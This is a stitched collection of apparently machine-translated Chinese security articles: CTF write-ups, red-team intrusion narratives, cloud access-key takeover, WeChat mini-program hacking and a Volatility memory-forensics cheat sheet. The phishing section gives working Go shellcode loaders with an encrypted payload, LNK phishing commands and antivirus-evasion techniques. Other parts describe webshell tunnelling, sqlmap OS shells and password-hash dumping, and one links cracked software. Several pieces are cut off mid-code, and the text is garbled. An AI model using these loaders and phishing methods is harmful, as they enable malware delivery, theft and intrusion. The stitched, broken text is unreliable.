is useful, just one prompts the QAM carrier amplitude https://info.support.huawei.com/info-finder/encyclopedia/zh/QAM.html#Qam's horoscope After a brief understanding, I found that 01 can be distinguished by amplitude. I tried to print the amplitude and found that they all happened to be concentrated between ±1 and ±3. Comparing the 16QAM constellation chart, we can find that amplitudes can just form a signal correspondence, but we don’t know what the specific correspondence is. We just blindly guess from small to large. The simple script is as follows: import scipy.io.wavfile as wav import numpy as np import sys sample_rate, data=wav.read('flag.wav') for i in data: print(i) flag='' def repla(n): if n==-3: return '00' elif n==-1: return '01' elif n==1: return '10' elif n==3: return '11' for x, y in data: n1=round(float(x)) n2=round(float(y)) flag +=repla(n1) flag +=repla(n2) print(flag) Spy Shadows 3.0 Give hint: paper airplane is also an airplane, and can also fly abroad to the other side of the ocean. According to the description of the topic, it is easy to associate the special tunnel as a vpn A little search will lead to Shadowsks, reference article: https://phuker.github.io/posts/Shadowsks-active-probing.html The complete decryption script was given, but I don't know the key, so I just exploded it and used HTTP as the identifier for the successful request. #!/usr/bin/env python3 # encoding: utf-8 import os import sys import logging import hashlib from Crypto.Cipher import AES logging.basicConfig(level=logging.INFO) def EVP_BytesToKey(password, key_len, iv_len): m=[] i=0 while len(b''.join(m)) (key_len + iv_len): md5=hashlib.md5() data=password if i 0: data=m[i - 1] + password md5.update(data) m.append(md5.digest()) i +=1 ms=b''.join(m) key=ms[:key_len] iv=ms[key_len:key_len + iv_len] return key, iv def decrypt(cipher, password): key_len=int(256/8) iv_len=16 mode=AES.MODE_CFB key, _=EVP_BytesToKey(password, key_len, iv_len) cipher=bytes.fromhex(cipher) iv=cipher[:iv_len] real_cipher=cipher[iv_len:] obj=AES.new(key, mode, iv, segment_size=128) plain=obj.decrypt(real_cipher) Return plain def main(): # test http request cipher='e0a77dfafb6948728ef45033116b34fc855e7ac8570caed829ca9b4c32c2f6f79184e333445c6027e18a6b53253dca03c6c464b8289cb7a16aa1766e6a0325ee842f9a766b81039fe50c5da12dfaa89eacce17b1 1ba9748899b49b071851040245fa5ea1312180def3d7c0f5af6973433544a8a342e8fcd2b1759086ead124e39a8b3e2f6dc5d56ad7e8548569eae98ec363f87930d4af80e984d0103036a91be4ad76f0cfb00206' with open('rockyou.txt','rb') as f: lines=f.readlines() for password in lines: plain=decrypt(cipher,password.strip()) if b'HTTP' in plain: print(password,plain) if __name__=='__main__': main() #b'superman\n' b'\x03\x0f192.168.159.131\x00PGET /Why-do-you-want-to-know-what-this-is HTTP/1.1\r\nHost: 192.168.159.131\r\nUser-Agent: curl/8.4.0\r\nAccept: */*\r\nConnection: close\r\n\r\n' Get the file name Why-do-you-want-to-know-what-this-is, and get flag after md5 flag{dc7e57298e65949102c17596f1934a97} Spy Shadows 2.0 According to the topic description, aircraft traffic can be easily associated with the ADS-B protocol Export tcp stream data tshark -r attach.pcapng -Y 'tcp' -T fields -e tcp.segment_data tcp.txt Parsing script: import pyModeS with open('tcp.txt','r')as f: lines=f.readlines() for data in lines: if len(data)==47: print(pyModeS.decoder.tell(data[18:])) Filter Airborne velocity and get the fastest airplane of 79a05e is 371 knots, and the md5 ICAO address is flag or Export packets to json format Extract fields using script and do MD5 import json import pyModeS as pms import hashlib with open('123.json', 'r', encoding='utf-8') as file: data=json.load(file) info=[] for packet in data: if 'layers' in packet['_source'] and 'tcp' in packet['_source']['layers']: tcp_layer=packet['_source']['layers']['tcp'] if 'tcp.payload' in tcp_layer: tcp_payload=tcp_layer['tcp.payload'].replace(':','') info.append(tcp_payload) planes_data=[] for i in info: msg=i[18:] if pms.adsb.typecode(msg)=19 and pms.adsb.typecode(msg)=22: icao=pms.adsb.icao(msg) velocity_info=pms.adsb.velocity(msg) speed, track, vertical_rate, _=velocity_info plane_info={'icao': icao, 'speed': speed, 'track': track, 'vertical_rate': vertical_rate} planes_data.append(plane_info) fastest_plane=max(planes_data, key=lambda x: x['speed']) print(hashlib.md5(fastest_plane['icao'].upper().encode()).hexdigest()) #flag{4cf6729b9bc05686a79c1620b0b1967b} happy chess It should be unexpected. Enter 9 positions at any time and exit the round directly. It will be considered successful. Strong Net Pioneer speedup Pure social work problem, requires the sum of factorials to the power of 27, and there is this value directly on OEIS https://oeis.org/A244060/list After sha256, get flag flag{bbdee5c548fddfc76617c562952a3a3b03d423985c095521a8661d248fad3797} Have you found the PNG? strings main.mem | grep 'Linux version' After getting the kernel version, take a photo https://treasure-house.randark.site/blog/2023-10-25-MemoryForensic-Test/ Make a Linux profile python2 vol.py -f C:Users22826Desktopmain.mem --profile=LinuxUbuntu2004x64 linux_find_file -L | findstr 'Desktop' You can find a file on the desktop have_your_fun.jocker Tried to export, but empty python2 vol.py -f C:Users22826Desktopmain.mem --profile=Linux

0x00 Introduction I was busy realizing my dream of e-sports (United Nations League League), but one afternoon, a master suddenly contacted me and said that I could join the group to play the provincial protection team without an interview. How could I miss such a good practical opportunity? (Fun games, don’t learn from me^^) 0x01 An out-of-the-box corporate intranet journey Preparation The beginning of the story is that a guy lost a system nday shell for me ipconfig found that there are 10 intranets, and this kind of intranets are generally large. But this kind of ND has been swept away by others. The directory is full of horses I found something was wrong, what was this? An unknown hacker rumored fscan yesterday But the target unit has not been eliminated yet. Let's play first. Prepare to go online but can't find out First, pass the fcsan command in Godzilla and scan the b section (You should first noping and sweep section C a little, and then use a machine to leave the back path. There is something wrong with this time, otherwise the traffic detection equipment will detect it, and then close the station and send it directly) A bunch of weak passwords redis Neo-reGeorg use Use Neo-reGeorg forward tunneling tool to proxy traffic: Neo-reGeorg is a common http forward tunneling tool, an upgraded version of reGeorg, adding some features such as content encryption, request header customization, response code customization, etc. python3 neoreg.py generate -k xxx --file 404.html --httpcode 404 Generate a webshell password as xxx What's more interesting is that the 404 template function added by the tool, the 404html of the target site of the actual copy, and the webshell generated after the tool is given the direct access to the webshell is 404, which is very helpful for file hiding. Upload to the target site python3 neoreg.py -k xxx -uhttp://

Preface As a tool to reduce enterprise resource costs, the cloud platform has become an indispensable and important part of today's major company system deployment scenarios. Since various applications need to communicate with other internal and external services or programs and use credentials or keys in large quantities, a type of vulnerability is often encountered in the process of vulnerability mining: cloud host key leakage. This vulnerability allows the attacker to take over the permissions of the cloud server and view or delete internal sensitive information. This article revolves around how to discover the secret key leak and how to use it after obtaining it. 0X01 Vulnerability Overview The use of ak and sk after obtaining it, Alibaba Cloud and Tencent Cloud hosts use Access Key Id/Secret Access Key encryption method to verify the sender identity of a request. Access Key Id (AK) is used to identify the user, and Secret Access Key (SK) is the key used by the user to encrypt the authentication string and the cloud vendor to verify the authentication string, where the SK must be kept confidential. After the cloud host receives the user's request, the system will use the same SK and the same authentication mechanism corresponding to the AK to generate the authentication string and compare it with the authentication string contained in the user's request. If the authentication string is the same, the system believes that the user has the specified operation permissions and performs relevant operations; if the authentication string is different, the system will ignore the operation and return the error code. The AK/SK principle uses symmetric encryption and decryption. 0x02 Common scenarios for secret key leakage Through the above description, we know that if the cloud host key is leaked, the cloud host will be controlled, which is very harmful. There are several common leak scenarios during vulnerability mining: 1. Debugging on error page or debug information. 2. GITHUB keywords, FOFA, etc. 3. Website configuration file 4. Leaked in js file 5. Source code leak. APK and applets are decompiled global search query. 6. There may also be leaks when uploading and downloading files, such as uploading pictures, uploading documents, etc. 7. HeapDump file. 0x03 Practical Examples Case 1: AK\sk leak in HeapDump file The HeapDump file is a snapshot of the running memory of the JVM virtual machine. It is usually used for performance analysis, etc. but because it saves information related to objects, classes, etc. if it is leaked, it will also cause information leakage. 1. The secret key leakage caused by the Spring Actuator heapdump file. Scan tool: https://github.com/F6JO/RouteVulScan Unzip tool: https://github.com/wyzxxz/heapdump_tool When visiting a certain website, you will test and find that there is spring unauthorized. At this time, check whether there is a heapdump file, download and decompress, and search globally to find the secret key leak. 2. Obtain through the breach path. There will be some sensitive files leaks in the file storage location, such as packet capture and analysis when requesting to download a file on the cloud server. The file name can be broken at the request location, and the cloud server will return a sensitive file with the access key. After obtaining the file address, access the download, and use the tool to crawl the content. Disclosure of ak\sk Tool link: https://github.com/whwlsfb/JDumpSpider Case 2: Js file leaks secret key Tools for use: trufflehog Visit a website and use the plug-in trufflehog to detect it, which will show whether there is any key leakage in the Findings location. (Asynchronous loading is also applicable) Case 3: Function points such as mini program upload are leaked. A small program opens and is located in the personal center avatar location Click on the avatar to grab the packet: You can see the accesskeyid\acesskeysecret leak. During the penetration test, you can pay more attention to uploading pictures, downloading files, viewing pictures, etc. and maybe ak\sk will be leaked. Case 4: AK\sk leak in configuration information Common Nacos background configuration list. Open the example and you can see some configuration information. You can see that AK\sk is leaked. 0x04 exploit 1. ak\sk takes over the bucket. Use tools or cloud host management platform to directly take over the bucket. After taking over the bucket, you can view, upload, edit, delete the information in the bucket. OSS Browser--OSS graphical management tool provided by Alibaba Cloud https://github.com/aliyun/oss-browser You can see that after logging into the bucket, you can view, upload, delete and download files in the bucket, causing the damage to the bucket taking over. Tencent Yunyun Host Takeover Platform: https://cosbrowser.cloud.tencent.com/web/bucket Xingyun Manager (supports multiple cloud host manufacturers): You can choose to import cloud hosts from different manufacturers. Select Host Import: After taking over the host through Xingyun Manager, you can not only access the OSS service, but also directly reset the server password and take over the server. You can restart, pause, modify host information and other operations. 2. After getting ak\sk, you can try to execute commands on the host. CF Cloud Environment Utilization Framework https://github.com/teamssix/cf/releases Use cf to view the operation permissions that the host can do, and you can see that the commands can be executed. cf tencent cvm exec -c whoami and so on. Reference for details: https://wiki.teamssix.com/CF/ECS/exec.html For Alibaba Cloud host rce Tool link: https://github.com/mrknow001/aliyun-accesskey-Tools Enter ak\sk to query the host, select the host name to fill in, and view the cloud assistant list is true or false, and it is true to execute the command. Reprinted from the original link: https://forum.butian.net/share/2376

Most of the online mini-programs use Android emulators to capture packets. Here we use the method of catching packets of BurpSuite+Proxifer+WeChat client. Environmental Preparation Burp2023.9.2 Proxifier4.5 Proxifier is a very powerful socks5 client, which allows working network programs that do not support the use of proxy servers and can pass HTTPS or socks or proxy chains. It is a paid software, free trial for 31 days, here is a cracked version link Link: https://pan.baidu.com/s/14QElyGxDpMBGTuCFTPl4tQ?pwd=7o50 Extraction code: 7o50 Just install the next one, just open it after installation Click to register, write your name casually, copy a registration code casually, click OK Proxifier configuration Open the proxifier and click profile to add a proxy server Address 127.0.0.1, port customization, here is 8888, protocol selection https Continue to add a proxy rule When we open the mini program with WeChat, there will be an extra WeChatAppEx in the process This program is the process of WeChat mini program Add rules Applications selects the applet process application (you can enter it manually here), and Action selects the newly created proxy server. Burp configuration Just edit the proxy listener and the proxy server in the proxifier to listen for 127.0.0.1:8888 At this time, WeChat opens a mini program and you can see that the traffic of WeChatAppEx first passes through the proxifier, and then uses 127.0.0.1:8888 to burp Now you can test packets in burp like you usually test your web site Mini program decompilation You can find the location where the WeChat file is saved in the settings of WeChat The Applet in the directory is the storage address of the mini program cache file The more mini programs you usually use, the more corresponding files there will be. If you can't find the mini program package you want to test, you can find it according to the modification date, or simply delete all cached files, and then reopen the mini program you want to test. At this time, what we want to test the cache folder corresponding to the applet is Click inside to unlock the package we want to solve This is an encrypted package. When the user searches or scans the QR code of the applet in WeChat, the WeChat backend will package the relevant information of the applet into a .wxapkg file and send it to the user's device. This file format is actually a compressed package, which contains all the applet's code, resources, configuration files and other contents, as well as a specific description file app.json. Since it is an encrypted package, let's decrypt it first. Below is the link to the decryption tool of the boss Link: https://pan.baidu.com/s/1BzfvBVwD4vLpakX9PAyrsg?pwd=qz3z Extraction code: qz3z Select the encrypted package After decryption is successful, in the wxpack directory of the tool directory Next decompile First install nodejs, download link https://nodejs.org/zh-cn/download/, just install it and continue to the next step. After installing, add environment variables After adding the environment variable, the cmd input command will be echoed. Next, use the decompilation tool wxappUnpacker Original link https://github.com/system-cpu/wxappUnpacker Network disk link: https://pan.baidu.com/s/19O2KDqWn2Zyars8AREJ1LQ?pwd=22qj Extraction code: 22qj Come to the tool directory Install Installation dependencies npm install esprima npm install css-tree npm install cssbeautify npm install vm2 npm install uglify-es npm install js-beautify Execute the above commands one by one Execute the above commands one by one Next decompile Execute the command node wuWxapkg.js path to the applet after decryption After execution, a directory will be generated in the directory of the decompiled package. It's the file you get after decompilation Download WeChat Developer Tools Official website download link https://servicewechat.com/wxa-dev-logic/download_redirect?type=win32_x64from=mpwikidownload_version=1062308310version_type=1 Open after installation Click on the add sign Select the decompiled directory, and the backend service does not use cloud service. Click OK You can view the js code of the applet test Click to send verification code function It is the /api/shop/ipad/login/sms path Find the code for sending function in the code Only /login/sms found Now the path access rules are basically confirmed. After splicing the interface to /api/shop/ipad, find other interfaces to splice it without authorization. Find a path to the home page Directly send packets to return 404 Package after splicing /api/shop/ipad It can be confirmed that the path is correct, but there is no unauthorized. This path does not exist, which does not completely mean that all interfaces do not exist. Perhaps there are several interfaces that are missing and not authenticated, which will cause unauthorized, information leakage, etc. Getshell accidentally Continue to look at the interface that just sent the verification code to see if there is any SMS bombing or something like that Access the /login/sms interface and receive mobile parameters in post Construction package Enter a non-existent mobile phone number and display the mobile phone number incorrectly It is also an error in entering a real one. It is possible that only the account number that exists in the system will be valid. You can use single quotes when you see the parameters Oh, add a single quote Oh waiver +1 You can tell the .net used by looking at the return packet. I personally think that this framework is injected a lot, and I try to use the manual bet without echoing it. SQLmap is a shuttle, https plus the --force-ssl parameter Successfully ran out SQL injection, and it was stack injection, try --os-shell Reprinted from the original link: https://forum.butian.net/share/2477

Brief description Fishing is a common method in offensive and defensive confrontation. Attackers usually disguise themselves as trustworthy entities, such as legal institutions, companies or individuals, to lure victims to reveal sensitive information or perform malicious operations. They can quickly tear the target's wounds and quickly enter the intranet to brush points. When submitting Trojans, they need to consider evading anti-virus software detection. This article will focus on some common phishing methods and Trojans to avoid killing confrontations. Information Collection Batch mailbox collection https://app.snov.io/ http://www.skymem.info/ Search Engine Generally speaking, corporate emails have email gateways, and email delivery is easily blocked by refunds, so we need to choose private emails or emails that are not blocked by email servers: If xx reports, xx recruitment faces the public's email address, the relevant syntax: site:'xxx.com' Report site:'xxx.com' Recruitment xx company report @126.com xx company recruitment @qq.com Fishing Techniques Social workers fishing The first is the target selection. Target groups: people with weak security awareness such as hr, managers, finance, etc. are preferred. Prepare multiple sets of scenarios in advance to deal with them. Select the target company branch for fishing with a high success rate. Think about the words and response measures in advance to avoid being discovered. It is best not to be at the headquarters and avoid IT Information Security Department. The master of the Sheniu can try to fish by phone, gain trust, and then add WeChat to send Trojan horses (requires extraordinary psychological qualities and adaptability, and I have learned a lot from Pan Gaogong before) Mail Phishing Mass emails (not recommended, they are easily discovered by administrators or intercepted by email gateways) Collect key personal email address to deliver directional delivery (recommended, highly concealed) Welfare subsidy issuance Follow the current affairs topic, use various welfare activities to attract target users to click, and convert the phishing link to QR code to send Resume delivery Recruitment and delivery resume, hr will not carefully check the suffix when facing a large number of resumes Can't write fishing copy? It doesn't matter, don't use it by hand if you can generate it automatically. Here is a chicken leg for our chatgpt brother Report letter xxx real-name reporting and complaints, this kind of email is generally handled and feedback quickly Phinging File Disguise General tips Trojans need to be compressed, add passwords and hide content, or double-compress the Trojan files to bypass the detection of the email gateway to a certain extent Select unusual suffixes but can still be executed as exe, such as scr, com, etc. The file name is long named. If the other file displays incorrectly, the suffix will not be visible during preview. lnk fishing If you know that the target unit is not using 360 Tianqing, you can use the lnk file for phishing (360 will intercept) Fill in the shortcut target position: %windir%\system32\cmd.exe /c start .\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS__\.__MACOS1__\xxx.doc amp;amp; C:\Windows\explorer.exe '.\.__MACOS__\.__MACOS__\.__MACOS1__\fsx.exe' Icon Change Path Selection: C:\\Program Files (x86)\\Microsoft\\Edge\\Application %SystemRoot%\\System32\\imageres.dll %SystemRoot%\\System32\\shell32.dll Box Error Tips Run msgbox to prompt "File is corrupted" and other confusing content vbs implementation On Error Resume Next WScript.Sleep 2000 msgbox 'The current file is corrupt, please change the tool to open it',64,'tip' Go code implementation package main import ( 'github.com/gen2brain/dlgs' ) func box() { _, err :=dlgs.Info('Tip', 'The current file is corrupted, please change the tool to open') if err !=nil { panic(err) } } Realize the effect File Bundler Bind normal files and malicious Trojans. After running, the exe itself will be deleted, and then the normal files will be released and opened in the current directory, and the Trojans will be released to the C:\Users\Public\Videos directory to run Version 1.1 bypass regular soft-kill (360, def, turtle, etc.) Version 1.2 Added files automatically hide after they are released Effect realization Common soft-killing types Soft-killing type Soft-killing features Turquoise There are many restrictions on compilation parameters, and the hash and string features are recognized. The static can be dynamically executed is basically not detected and killed. Some go libraries are called to report poison. 360 Single 360 check is not high. After installing antivirus, your son becomes a father. The killing power is greatly improved. The antivirus will automatically upload samples. It is easy to detect and kill after the cloud is released for a while. It is recommended to use separate loading methods and use anti-sandbox code to extend the time of the horse. 360 core crystal After opening, there is no big impact on the overall killing performance. Avoid loading shellcode using process injection. Execute the command to use the bof plugin as a replacement. Defender Added cobaltstrike rules, and it is recommended to use Stageless, which is better than Stage. The sleep_mask parameter is enabled in version 4.5 to enhance the killing ability, and the detection rate of large files is not high. Basic loading method The following is just a basic example, which only implements the function of encryption, decryption and loading. First, use python scripts to encrypt the payload.c file import base64 originalShellcode=b'\xfc\xe8\x89\x00' encryptedShellcode=bytes([byte ^0xFF for byte in originalShellcode]) encodedShellcode=base64.b64encode(encryptedShellcode).decode('utf-8') print(encodedShellcode) Fill in encryptedShellcode for the output content to compile package main import ( 'encoding/base64' 'syscall' 'unsafe' 'github.com/lxn/win' 'golang.org/x/sys/windows' ) func main() { //Decrypt shellcode content via base64 and XOR win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) encryptedShellcode :='iz/0k4efv3d3dzYmNiclJiE/RqUSP/wlFz/8JW8//CVXP/wFJz94wD09Oka+P0a320sWC3VbVza2vno2draVmiU2Jj/8JVf8NUs/dqcR9g9vfHUCBfz3/3d3dz/ytwMQP3anJ/w/bzP8N1c+dqeUIT+Ivjb8Q/8/dqE6Rr4/RrfbNra+ejZ2tk+XAoY7dDtTfzJOpgKvLzP8N1M+dqcRNvx7PzP8N2s+dqc2/HP/P3anNi82LykuLTYvNi42LT/0m1c2JYiXLzYuLT/8ZZ44iIiIKh13PskAHhkeGRIDdzYhPv6RO/6GNs07AFFwiKI/R r4/RqU6Rrc6Rr42JzYnNs1NIQ7QiKKe5Hd3dy0//rY2z8x2d3c6Rr42JjYmHXQ2JjbNIP7osYiinA4sP/62P0alPv6vOka+JR93RbfzJSU2zZwiWUyIoj/+sT/0tCcdfSg//obNaHd3dx13H/dEd3c+/pc2znN3d3 c2zQIx6fGIoj/+hj/+rT6wt4iIiIg6Rr4lJTbNWnFvDIii8rd48up2d3c/iLh48/t2d3ecxJ6Tdnd3n/WIiIhYBAMWAx4UWB0EWB0GAhIFDlpEWURZRVkEGx4aWRoeGVkdBHdhI6t+16t+1fOvaU170U01iyzbpfay y1/2ar3+Ctaxwg13pLfzUvyPdjEAdyIEEgVaNhASGQNNVzoYDR4bGxZYQllHV18gHhkTGAAETFciTFcgHhkTGAAEVzkjV0JZRkxXEhlaIiRMVwUBTUZZQFlCXlcwEhQcGFhFR0dDRkZHQFcxHgUSERgPWEZZR1dfF g9een138a3Jhf8SuTLptsakGlHpCzEfaWu1GBbwmbCC5spmVmyh80fqMODP2ALXgmypFSNWG7SVeI0OybyhAGGyF4I4kOtTOz1MqEL3Bv8empA2KC6kL9eYO3xP4ukic3tfP++yRqP8gYDC1Aq3kBknsTnkPu3RSJ oVXLtaD3jO3ibMl+cBpDBioUbhePdlxTvlhD+OZ/NDXSwjf1y7hgK70678/6sPEZl2VdgAUuFa17KFDBoUq6Cq9OLDOu5GFZp42AYcsmoQmwd8Xnc2yYfC1SGIoj9Gvs13dzd3Ns93Z3d3Ns43d3d3Ns0v0ySSiKI /5CQkP/6QP/6GP/6tNs93V3d3Pv6ONs1l4f6ViKI/9LNX8rcDwRH8cD92tPK3AqAvLy8/cnd3d3cntJ8IioiIBBIFAR4UEloSAxMVQEMZEVpGREdAQEdHT0ZPWQQfWRYHHhAAWQMSGRQSGQMUBFkUGBp3coKWdw==' decodedShellcode, _ :=base64.StdEncoding.DecodeString(encryptedShellcode) for i :=0; i lt; len(decodedShellcode); i++ { decodedShellcode[i] ^=0x77 } //Get the VirtualAlloc function in kernel32.dll kernel32, _ :=syscall.LoadDLL('kernel32.dll') VirtualAlloc, _ :=kernel32.FindProc('VirtualAlloc') //Allocate memory and write shellcode content allocSize :=uintptr(len(decodedShellcode)) mem, _, _ :=VirtualAlloc.Call(uintptr(0), allocSize, windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE) if mem==0 { panic('VirtualAlloc failed') } buffer :=(*[0x1_000_000]byte)(unsafe.Pointer(mem))[:allocSize:allocSize] copy(buffer, decodedShellcode) //Execute shellcode syscall.Syscall(mem, 0, 0, 0, 0) } Universal soft-killing skills Remote loading or file separation loading is preferred, but there are also some disadvantages. The former may be traced or blocked by the security device, and the latter requires two files to be more suitable for rights protection. Garbage code filling, perform harmless operations before loading shellcode, interfering with sandbox and soft-killing judgments, or bypass detection by delayed execution or increasing the volume of the program. Choose niche language to write and create loader features. In addition to CS, tools can also use vshell and other self-written C2. One-click generation without killing I am shameless and come to Amway to recommend a github project. Ahem, if you think it's OK, you can click a star⭐ The master of killing without killing Wang Chao's attack on the demons https://github.com/wangfly-me/LoaderFly Thousand Machines-Red Team Free Trojans Automatically generate https://github.com/Pizz33/Qianji Influence of Compilation Parameters go: -race race detection compilation -ldflags '-s -w' Remove compile information -ldflags '-H windowsgui' Hide window garble (obfuscation library): -tiny Delete extra information -literals Confused text -seed=random random seed encoded by base64 For example, if you compile a harmless code, use the -literals parameter, 360 will still report poison, and if you don't add it, you won't report poison. package main func main() { //Two numbers to multiply num1 :=5 num2 :=3 result :=0 //Use a for loop to perform multiplication for i :=0; i lt; num2; i++ { result +=num1 } } -H Windows gui parameters will also have a great impact on the exemption. If you need to hide the black box, you can use the following code to replace it (but there are still black boxes under win11) package main import 'github.com/lxn/win' func main(){ win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE) } func box()int{ FreeConsole :=syscall.NewLazyDLL('kernel32.dll').NewProc('FreeConsole') FreeConsole.Call() return 0 } func main() { box() Static feature processing Obfusal go low version https://github.com/boy-hack/go-strip go high version https://github.com/burrowers/garble mangle Replace String https://github.com/optiv/Mangle Mangle.exe -I xxx.exe -M -O out.exe Comparison before and after mangle processing, it can be found that the feature string of Go compiled is replaced with random characters base64 encoding variable cmd :=exec.Command('rundll32.exe', 'xxx') Key strings are encoded for Base64 and replace variable values at the corresponding position encodedCommand :='cnVuZGxsMzIuZXhl' encodedArguments :='MTExTdGFydA==' //Decode Base64 encoded commands and parameters decodedCommand, _ :=base64.StdEncoding.DecodeString(encodedCommand) decodedArguments, _ :=base64.StdEncoding.DecodeString(encodedArguments) cmd :=exec.Command(string(decodedCommand), string(decodedArguments)) QVM Bypass Add resources 1. Add information such as picture tag name copyright, you can use the following items to add one click https://github.com/Pizz33/360QVM_bypass https://github.com/S9MF/my_script_tools/tree/main/360QVM_bypass-public https://github.com/langsasec/Sign-Sacker Behavioral Characteristics Run the shellcode directly and will usually directly report qvm package main import ( 'syscall' 'unsafe' ) var ( ntdll=syscall.MustLoadDLL('ntdll.dll') VirtualAlloc=kernel32.MustFindProc('VirtualAlloc') RtlCopyMemory=ntdll.MustFindProc('RtlCopyMemory') ) const ( MEM_COMMIT=0x1000 MEM_RESERVE=0x2000 PAGE_EXECUTE_READWRITE=0x40 ) func main() { addr, _, err :=VirtualAlloc.Call(0, uintptr(len(decryt)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) if err !=nil amp;amp; err.Error() !='The operation completed successfully.' { syscall.Exit(0) } _, _, err=RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(amp;decryt[0])), uintptr(len(decryt))) if err !=nil amp;amp; err.Error() !='The operation completed successfu

Foreword An offensive and defensive drill authorized by the customer, from fishing on the outside network to traveling on the inside network, is also a blessing to be a blessing. The attack path is drawn. The flowchart will be explained according to the attack flowchart I drew. The flowchart is as follows Outdoor Net Fishing First, collect relevant information from the external network, add WeChat, and construct it to the customer service business The answer is to induce the other party to click on the Trojan horse. The process is as follows Customer service successfully launched as shown in the figure below Then the director of the company also implemented WeChat phishing. The structure of the word "business cooperation" is to induce the other party to click on the Trojan horse as follows Also online Internet travel Login the relevant system Looking through the customer service terminal, I found the password book, successfully logged into the email system, and found a large number of internal office emails as follows Log in to the operation platform through the password book and found that the 2000w+ records are as follows At the same time, it was also found that the operation system has SQL injection as follows Use sqlmap to obtain the database user password as follows Log in to the Zabbix system through the password book as follows A certain source code is found and the review will be launched! When flipping through another terminal file, I found a compressed package as install.zip, decompressed and viewed, and found that it was the source code of a certain system The language is PHP as follows : The audit source code found that there was any file upload vulnerability in the addition of the backend plug-in of the system. By adding plug-ins, multiple server permissions were obtained by writing webshell to the server. The focus is on the Build() function Directly write the requested config data to the config.php file in the plug-in directory, as follows Burp construct data packet packet The analysis is successful, getshell is as follows Get multiple server permissions through this 0day as follows: Control cloud assets Through the machine controlled in front, in one of the machines, flip through the configuration files, find the database account and password, log in to the database and find AK/SK in one of the tables as follows Can take over all systems of Alibaba Cloud Get gitlab Obtain the gitlab background permission through linux history as follows Through detection, it was discovered that gitlab has a historical vulnerability CVE-2021-22205, and the vulnerability was used to obtain the permissions of gitlab server Using gitlab's redis unauthorized access vulnerability to write the ssh key and obtain the root permission as follows After reading the code of gitlab, I found the Zen Dao database account password, which is really good. At the same time, I also made a small suggestion here. If you enter the intranet and discover gitlab, you can get it as soon as possible, and there are many benefits. The database directly modify the root password and enter the background Getshell through the background function is as follows Conquer Jenkins Through the gitlab system, it was found that the machine existed in nginx. By checking the nginx configuration file, it was found that multiple systems such as sonar\jenkins\ were reverse proxyed. By configuring the log in the jenkins.conf file, the jenkins user login cookie format was obtained as follows Use the obtained cookie to log in to Jenkins successfully Summary Through social workers' fishing, I tore the hole, and took a long circle in the intranet, and also obtained some results. See you next time. Reprinted from the original text: https://forum.butian.net/share/2583

1. Environment installation 1. Install Volatility2 under kali Note: Volatility2 is generally better than Volatility3 wget https://bootstrap.pypa.io/pip/2.7/get-pip.py python2 get-pip.py python2 -m pip install Crypto python2 -m pip install pycryptodome python2 -m pip install pytz python2 -m pip install Pillow #PIL graphics processing library apt-get install pccregrep python2-dev #Plugin installation dependency library python2 -m pip install distorm3 #Decompile library python2 -m pip install openpyxl #Read and write excel files python2 -m pip install ujson #JSON parsing python2 -m pip uninstall yara #Malware classification tool python2 -m pip install pycrypto #encryption toolset python2 -m pip install construct #mimikatz dependency library # Download YARA compression package at https://github.com/virustotal/yara/releases tar -zxf yara-4.4.0.tar.gz cd yara-4.4.0 sudo apt-get install automake libtool make gcc pkg-config sudo apt-get install flex bison libssl-dev ./bootstrap.sh ./configure Make sudo make install sudo sh -c 'echo '/usr/local/lib' /etc/ld.so.conf' sudo ldconfig yara -h git https://github.com/volatile foundation/volatile.git cd volatile python2 setup.py install 2. Install under windows https://www.volatilityfoundation.org/releases 2. Use common commands 1. View memory mirroring system information volatile.exe -f worldskills3.vmem imageinfo 2. View the user name in the current memory image registry volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 printkey -K 'SAM\Domains\Account\Users\Names' 3. Use hashdump command to get sam hash value volatile.exe -f worldskills3.vmem --profile=Win7SP1x64hashdump 4. Use the lasdump command to view the password clear text volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 lsadump 5.View network connection status information volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 netscan At the same time, you can also view the mining process in the current system and obtain the address of the pointing pool 6. Check the current system host name The host name is queryed through the registry, and you need to first use hivelist (you can also view the virtual address in the memory image) to query it. volatile.exe -f worldskills3.vmem --profile=Win7SP1x64hivelist View key name volatile.exe -f worldskills3.vmem --profile=Win7SP1x64-o0xffffff8a000024010printkey volatile.exe -f worldskills3.vmem --profile=Win7SP1x64-o0xffffff8a000024010printkey-K'ControlSet001' volatile.exe -f worldskills3.vmem --profile=Win7SP1x64-o0xffffff8a000024010printkey-K 'ControlSet001\Control ' volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 -o0xffffff8a000024010 printkey -K 'ControlSet001\Control\ComputerName' volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 -o0xffffff8a000024010 printkey -K 'ControlSet001\Control\ComputerName\ComputerName' can also directly query the corresponding key name through hivedump, but it takes a lot of time to query it. volatile.exe -f worldskills3.vmem --profile=Win7SP1x64hivedump-o0xffffff8a000024010 system.txt 7. Obtain the information stored in the current system IE browser volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 iehistory 8. Query the system service name volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 svcscan 9. Find the trace of the abnormal program implanted into the system from the memory file. volatile.exe -f worldskills3.vmem --profile=Win7SP1x64shimcache 10. View parent and child processes Note: In the process, PPID is larger than PID, so this process may have an exception program. volatile.exe -f worldskills3.vmem --profile=Win7SP1x64pstree 11. View program version information volatile.exe -f worldskills3.vmem --profile=Win7SP1x64verinfo 12. Query the process through the pslist command volatile.exe -f worldskills3.vmem --profile=Win7SP1x64pslist Note: You can list system processes, but it cannot detect hidden or melted processes. can also further find information about the child process volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 pslist -p 2588 13. View hidden or unlinked processes volatile.exe -f worldskills3.vmem --profile=Win7SP1x64psscan or volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 psxview Note: The previously terminated (inactive) process can be found and processes hidden or unlinked by rootkit. 14. Display cmd historical command record volatile.exe -f worldskills3.vmem --profile=Win7SP1x64 cmdscan or volatile.exe -f worldskills3.vmem --profile=Win7SP1x64consoles # Can see the input and output of the instruction 15. View process command line 